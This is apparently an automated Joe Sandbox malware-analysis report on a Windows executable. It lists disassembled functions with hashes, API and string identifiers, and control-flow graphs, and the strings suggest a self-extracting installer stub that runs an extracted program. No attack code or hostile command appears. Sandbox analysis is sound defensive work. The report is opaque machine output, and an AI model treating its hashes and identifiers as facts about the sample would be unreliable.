                                                                                    Function 00007FF7B8EFEDF8 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1386COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: __tmp_reference_source_
                                                                                    • API String ID: 3668304517-685763994
                                                                                    • Opcode ID: f91086ace03ad35f10c4dcce2a6d7d0a1a52da07ce94979dffe45fd4567cf1b8
                                                                                    • Instruction ID: 22bfba3c1a4c7c0e53bbdbb9516fc698902af7359451e2e628e762e33a26dc77
                                                                                    • Opcode Fuzzy Hash: f91086ace03ad35f10c4dcce2a6d7d0a1a52da07ce94979dffe45fd4567cf1b8
                                                                                    • Instruction Fuzzy Hash: 42D29872A086C249FA60EB28E0507FEE751EBA2795FC04132DB9D07699DF7CE446C724
                                                                                    Function 00007FF7B8F0341C Relevance: 10.6, APIs: 7, Instructions: 150fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                    • String ID:
                                                                                    • API String ID: 474548282-0
                                                                                    • Opcode ID: a24d2ff12b784527da30e71e223fd3b8a0d8b3bfa75af368445b263c8be1639e
                                                                                    • Instruction ID: 448db6996f1cc8da77e75de1f83c246f4e6495d4ecfc57a596219e694127ce1a
                                                                                    • Opcode Fuzzy Hash: a24d2ff12b784527da30e71e223fd3b8a0d8b3bfa75af368445b263c8be1639e
                                                                                    • Instruction Fuzzy Hash: 4251C472A1864249EA10AF2CE44027DE361EBA67A5F905331EBBD026DDDF3CE545C718
                                                                                    Function 00007FF7B8F01890 Relevance: 9.2, APIs: 6, Instructions: 163filetimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2930 7ff7b8f01890-7ff7b8f018cb 2931 7ff7b8f018d6 2930->2931 2932 7ff7b8f018cd-7ff7b8f018d4 2930->2932 2933 7ff7b8f018d9-7ff7b8f0194b 2931->2933 2932->2931 2932->2933 2934 7ff7b8f01950-7ff7b8f0197b CreateFileW 2933->2934 2935 7ff7b8f0194d 2933->2935 2936 7ff7b8f01981-7ff7b8f019b3 GetLastError call 7ff7b8f05d18 2934->2936 2937 7ff7b8f01a5d-7ff7b8f01a61 2934->2937 2935->2934 2946 7ff7b8f019b5-7ff7b8f019ff CreateFileW GetLastError 2936->2946 2947 7ff7b8f01a01 2936->2947 2938 7ff7b8f01a67-7ff7b8f01a6b 2937->2938 2940 7ff7b8f01a6d-7ff7b8f01a70 2938->2940 2941 7ff7b8f01a79-7ff7b8f01a7d 2938->2941 2940->2941 2943 7ff7b8f01a72 2940->2943 2944 7ff7b8f01aa3-7ff7b8f01ab7 2941->2944 2945 7ff7b8f01a7f-7ff7b8f01a83 2941->2945 2943->2941 2949 7ff7b8f01acd-7ff7b8f01af6 call 7ff7b8f21d70 2944->2949 2950 7ff7b8f01ab9-7ff7b8f01ac9 call 7ff7b8ef3cac 2944->2950 2945->2944 2948 7ff7b8f01a85-7ff7b8f01a9d SetFileTime 2945->2948 2951 7ff7b8f01a07-7ff7b8f01a0f 2946->2951 2947->2951 2948->2944 2950->2949 2953 7ff7b8f01a11-7ff7b8f01a28 2951->2953 2954 7ff7b8f01a48-7ff7b8f01a5b 2951->2954 2957 7ff7b8f01a43 call 7ff7b8f21c5c 2953->2957 2958 7ff7b8f01a2a-7ff7b8f01a3d 2953->2958 2954->2938 2957->2954 2958->2957 2960 7ff7b8f01af7-7ff7b8f01aff call 7ff7b8f26834 2958->2960
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3536497005-0
                                                                                    • Opcode ID: c18a9f1c3d6eab003a3d29304bc85d795b95a6b9438e39820003dab6a4f2ac53
                                                                                    • Instruction ID: 4045c2e84cbc6a0ea6bcdb92fb96d284d8919d0df63521d793cd45a986500a87
                                                                                    • Opcode Fuzzy Hash: c18a9f1c3d6eab003a3d29304bc85d795b95a6b9438e39820003dab6a4f2ac53
                                                                                    • Instruction Fuzzy Hash: 70611672E1878149E7209F29E40036EE3A1FB967A8F501324DF6903AD8DF3DD095C758
                                                                                    Function 00007FF7B8EF5B70 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 615COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3668304517-2756464174
                                                                                    • Opcode ID: 88684c639f996074f86357842ede796d6606e66908108f93a9e10c57918a551b
                                                                                    • Instruction ID: 1e931c8afea1435a9c19c4d0576427fc08dc2bee6435410b1464508daac1bad8
                                                                                    • Opcode Fuzzy Hash: 88684c639f996074f86357842ede796d6606e66908108f93a9e10c57918a551b
                                                                                    • Instruction Fuzzy Hash: 36429F62B096819BFB28EB78C1402FDE7A1EB62344FC00135DB1E576AADF38E556C714
                                                                                    Function 00007FF7B8EF5300 Relevance: 3.8, APIs: 2, Instructions: 761COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: d4cb9642bf35cf19596150dc5cd9054b1a982cf0db4c97b36a83573f98c0f2c7
                                                                                    • Instruction ID: d94a832fa4d74aebc641ec07e9701355a0effe6925e2bd802546b97c39736bc9
                                                                                    • Opcode Fuzzy Hash: d4cb9642bf35cf19596150dc5cd9054b1a982cf0db4c97b36a83573f98c0f2c7
                                                                                    • Instruction Fuzzy Hash: B762B322B086829AFA14BB69D5543FDE361AB67784FC40435DF1E0779ADE3CE446C328
                                                                                    Function 00007FF7B8F04620 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1017591355-0
                                                                                    • Opcode ID: fb0fe6c50d231e4ec5e0e3e62b44b574a4a083417dfe53d0c6adc7b5dc8768f6
                                                                                    • Instruction ID: 8088bd16bb2444bef06292fc51100713b972d9fb6c53d99bf19635f4ce5082ff
                                                                                    • Opcode Fuzzy Hash: fb0fe6c50d231e4ec5e0e3e62b44b574a4a083417dfe53d0c6adc7b5dc8768f6
                                                                                    • Instruction Fuzzy Hash: C761E231E086874CE964BE6D841527AD1D19FB37CAFA44531EB2D066CEEE2CE4438228
                                                                                    Function 00007FF7B8F116B8 Relevance: .3, Instructions: 330COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eac8cf9733ccd7ec16caffdcbacd6561e15b7abeaaf97ad0c6077139682758ca
                                                                                    • Instruction ID: 15b79c92049a693f3d795636d132b5390fdd672e09d0f64b010aa0b022e460fd
                                                                                    • Opcode Fuzzy Hash: eac8cf9733ccd7ec16caffdcbacd6561e15b7abeaaf97ad0c6077139682758ca
                                                                                    • Instruction Fuzzy Hash: 8DD1F572E092C28EEB60EF2D90442ADF791FBB6749F444135DB5E47649CE3DE4828718
                                                                                    Function 00007FF7B8F12CBC Relevance: .3, Instructions: 295COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a74d6a62e75452a2cdb1f3943068df38483f07de4ea6e36386f981bbb4d49855
                                                                                    • Instruction ID: 2a6f1faf931a76a288fc27d04c9fb60096482ddf6c0b4d516dc636fef2ef45d9
                                                                                    • Opcode Fuzzy Hash: a74d6a62e75452a2cdb1f3943068df38483f07de4ea6e36386f981bbb4d49855
                                                                                    • Instruction Fuzzy Hash: DBB1D0B27046CA9ADA58EB6A96187A9E391F756BC4F848032CF5D07748DF3CE466C304
                                                                                    Function 00007FF7B8F03C88 Relevance: .1, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID:
                                                                                    • API String ID: 3340455307-0
                                                                                    • Opcode ID: a32e6ea11df6d9526cd90f5d70a51f62bbf855f107e67f4d70b6b7828c839f25
                                                                                    • Instruction ID: f2291bcb26d6fc9e3c2a659158545d49294759ba3117ac1ac70104001373679d
                                                                                    • Opcode Fuzzy Hash: a32e6ea11df6d9526cd90f5d70a51f62bbf855f107e67f4d70b6b7828c839f25
                                                                                    • Instruction Fuzzy Hash: 81412732B156564EEB64EF29A91076AE252BB96784F844030DF1E07798CE3CE447871C
                                                                                    Function 00007FF7B8F08B10 Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 700COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                    • API String ID: 3629253777-3268106645
                                                                                    • Opcode ID: 8aaf1c45cbcc11cbfd530713bfdb0f17bae577493be60ab4fa7bf8ddb10da4b4
                                                                                    • Instruction ID: 954c5876aeece3fddf9c00a5134394b69a96af4d46c6fce83034e773e08dd3e7
                                                                                    • Opcode Fuzzy Hash: 8aaf1c45cbcc11cbfd530713bfdb0f17bae577493be60ab4fa7bf8ddb10da4b4
                                                                                    • Instruction Fuzzy Hash: 5D62AD32B296468DEB10AF28C4442B9E365FB62785FC08131DB6D476D9EF3CE546C364
                                                                                    Function 00007FF7B8F1ED28 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 282windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1908 7ff7b8f1ed28-7ff7b8f1ed6b 1909 7ff7b8f1ed71-7ff7b8f1edad call 7ff7b8f35750 1908->1909 1910 7ff7b8f1f0d6-7ff7b8f1f0fb call 7ff7b8ef1fa8 call 7ff7b8f21d70 1908->1910 1916 7ff7b8f1edaf 1909->1916 1917 7ff7b8f1edb2-7ff7b8f1edb9 1909->1917 1916->1917 1919 7ff7b8f1edca-7ff7b8f1edce 1917->1919 1920 7ff7b8f1edbb-7ff7b8f1edbf 1917->1920 1923 7ff7b8f1edd0 1919->1923 1924 7ff7b8f1edd3-7ff7b8f1edde 1919->1924 1921 7ff7b8f1edc1 1920->1921 1922 7ff7b8f1edc4-7ff7b8f1edc8 1920->1922 1921->1922 1922->1924 1923->1924 1925 7ff7b8f1ee6f 1924->1925 1926 7ff7b8f1ede4 1924->1926 1927 7ff7b8f1ee73-7ff7b8f1ee76 1925->1927 1928 7ff7b8f1edea-7ff7b8f1edf1 1926->1928 1929 7ff7b8f1ee78-7ff7b8f1ee7c 1927->1929 1930 7ff7b8f1ee7e-7ff7b8f1ee81 1927->1930 1931 7ff7b8f1edf3 1928->1931 1932 7ff7b8f1edf6-7ff7b8f1edfb 1928->1932 1929->1930 1935 7ff7b8f1eea7-7ff7b8f1eeba call 7ff7b8f056b0 1929->1935 1930->1935 1936 7ff7b8f1ee83-7ff7b8f1ee8a 1930->1936 1931->1932 1933 7ff7b8f1edfd 1932->1933 1934 7ff7b8f1ee2f-7ff7b8f1ee3a 1932->1934 1937 7ff7b8f1ee12-7ff7b8f1ee19 1933->1937 1940 7ff7b8f1ee3c 1934->1940 1941 7ff7b8f1ee3f-7ff7b8f1ee44 1934->1941 1951 7ff7b8f1eebc-7ff7b8f1eeda call 7ff7b8f10ad8 1935->1951 1952 7ff7b8f1eedf-7ff7b8f1ef3a call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f0266c call 7ff7b8ef1fa8 1935->1952 1936->1935 1938 7ff7b8f1ee8c-7ff7b8f1eea3 1936->1938 1942 7ff7b8f1ee1b 1937->1942 1943 7ff7b8f1edff-7ff7b8f1ee06 1937->1943 1938->1935 1940->1941 1945 7ff7b8f1ee4a-7ff7b8f1ee51 1941->1945 1946 7ff7b8f1f0fc-7ff7b8f1f103 1941->1946 1942->1934 1947 7ff7b8f1ee08 1943->1947 1948 7ff7b8f1ee0b-7ff7b8f1ee10 1943->1948 1953 7ff7b8f1ee53 1945->1953 1954 7ff7b8f1ee56-7ff7b8f1ee5c 1945->1954 1949 7ff7b8f1f108-7ff7b8f1f10d 1946->1949 1950 7ff7b8f1f105 1946->1950 1947->1948 1948->1937 1955 7ff7b8f1ee1d-7ff7b8f1ee25 1948->1955 1956 7ff7b8f1f120-7ff7b8f1f128 1949->1956 1957 7ff7b8f1f10f-7ff7b8f1f116 1949->1957 1950->1949 1951->1952 1975 7ff7b8f1ef3c-7ff7b8f1ef8a call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f04ee4 call 7ff7b8ef1fa8 1952->1975 1976 7ff7b8f1ef8f-7ff7b8f1ef9c ShellExecuteExW 1952->1976 1953->1954 1954->1946 1960 7ff7b8f1ee62-7ff7b8f1ee69 1954->1960 1961 7ff7b8f1ee27 1955->1961 1962 7ff7b8f1ee2a 1955->1962 1965 7ff7b8f1f12a 1956->1965 1966 7ff7b8f1f12d-7ff7b8f1f138 1956->1966 1963 7ff7b8f1f118 1957->1963 1964 7ff7b8f1f11b 1957->1964 1960->1925 1960->1928 1961->1962 1962->1934 1963->1964 1964->1956 1965->1966 1966->1927 1975->1976 1978 7ff7b8f1f088-7ff7b8f1f090 1976->1978 1979 7ff7b8f1efa2-7ff7b8f1efac 1976->1979 1983 7ff7b8f1f092-7ff7b8f1f0a8 1978->1983 1984 7ff7b8f1f0c4-7ff7b8f1f0d1 1978->1984 1980 7ff7b8f1efbc-7ff7b8f1efbf 1979->1980 1981 7ff7b8f1efae-7ff7b8f1efb1 1979->1981 1986 7ff7b8f1efdb-7ff7b8f1efee WaitForInputIdle call 7ff7b8f1f638 1980->1986 1987 7ff7b8f1efc1-7ff7b8f1efcc IsWindowVisible 1980->1987 1981->1980 1985 7ff7b8f1efb3-7ff7b8f1efba 1981->1985 1989 7ff7b8f1f0aa-7ff7b8f1f0bd 1983->1989 1990 7ff7b8f1f0bf call 7ff7b8f21c5c 1983->1990 1984->1910 1985->1980 1991 7ff7b8f1f02d-7ff7b8f1f03a CloseHandle 1985->1991 1997 7ff7b8f1eff3-7ff7b8f1effa 1986->1997 1987->1986 1992 7ff7b8f1efce-7ff7b8f1efd9 ShowWindow 1987->1992 1989->1990 1995 7ff7b8f1f13d-7ff7b8f1f143 call 7ff7b8f26834 1989->1995 1990->1984 2000 7ff7b8f1f03c-7ff7b8f1f04d call 7ff7b8f10ad8 1991->2000 2001 7ff7b8f1f04f-7ff7b8f1f056 1991->2001 1992->1986 1997->1991 2004 7ff7b8f1effc-7ff7b8f1efff 1997->2004 2000->2001 2003 7ff7b8f1f070-7ff7b8f1f072 2000->2003 2002 7ff7b8f1f058-7ff7b8f1f05b 2001->2002 2001->2003 2002->2003 2009 7ff7b8f1f05d-7ff7b8f1f064 2002->2009 2003->1978 2010 7ff7b8f1f074-7ff7b8f1f077 2003->2010 2004->1991 2011 7ff7b8f1f001-7ff7b8f1f012 GetExitCodeProcess 2004->2011 2009->2003 2013 7ff7b8f1f066 2009->2013 2010->1978 2014 7ff7b8f1f079-7ff7b8f1f087 ShowWindow 2010->2014 2011->1991 2015 7ff7b8f1f014-7ff7b8f1f01e 2011->2015 2013->2003 2014->1978 2017 7ff7b8f1f020 2015->2017 2018 7ff7b8f1f026 2015->2018 2017->2018 2018->1991
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                    • String ID: .exe$.inf$Install$p
                                                                                    • API String ID: 148627002-3607691742
                                                                                    • Opcode ID: 2d7998a32035a4fc601e65b4436ed2b79fab0909f737541ab6a1b27ecdec70d9
                                                                                    • Instruction ID: d41a396bbdd468f78bdba1cc2659a979555363497e2e1d37087fc872664abef8
                                                                                    • Opcode Fuzzy Hash: 2d7998a32035a4fc601e65b4436ed2b79fab0909f737541ab6a1b27ecdec70d9
                                                                                    • Instruction Fuzzy Hash: F1C19272F0864299FB50FB29D44027DE3A1EFA6B81F844131DB4D53699DF3CE9928328
                                                                                    Function 00007FF7B8F1E8DC Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3569833718-0
                                                                                    • Opcode ID: 0fb222555432dd670f17b16db3dadffebd863f7b02b7ecab73019b4fc4b50d88
                                                                                    • Instruction ID: 50fe464b658042b0e853ca8a20a2e39625a983c3d6f9e2226d66ae2b8d31905d
                                                                                    • Opcode Fuzzy Hash: 0fb222555432dd670f17b16db3dadffebd863f7b02b7ecab73019b4fc4b50d88
                                                                                    • Instruction Fuzzy Hash: 0C41F931B146428EF700AF69D8007A9A761FB5AB89FC41531DE0E07B8DCF3DE50A8B14
                                                                                    Function 00007FF7B8F21330 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
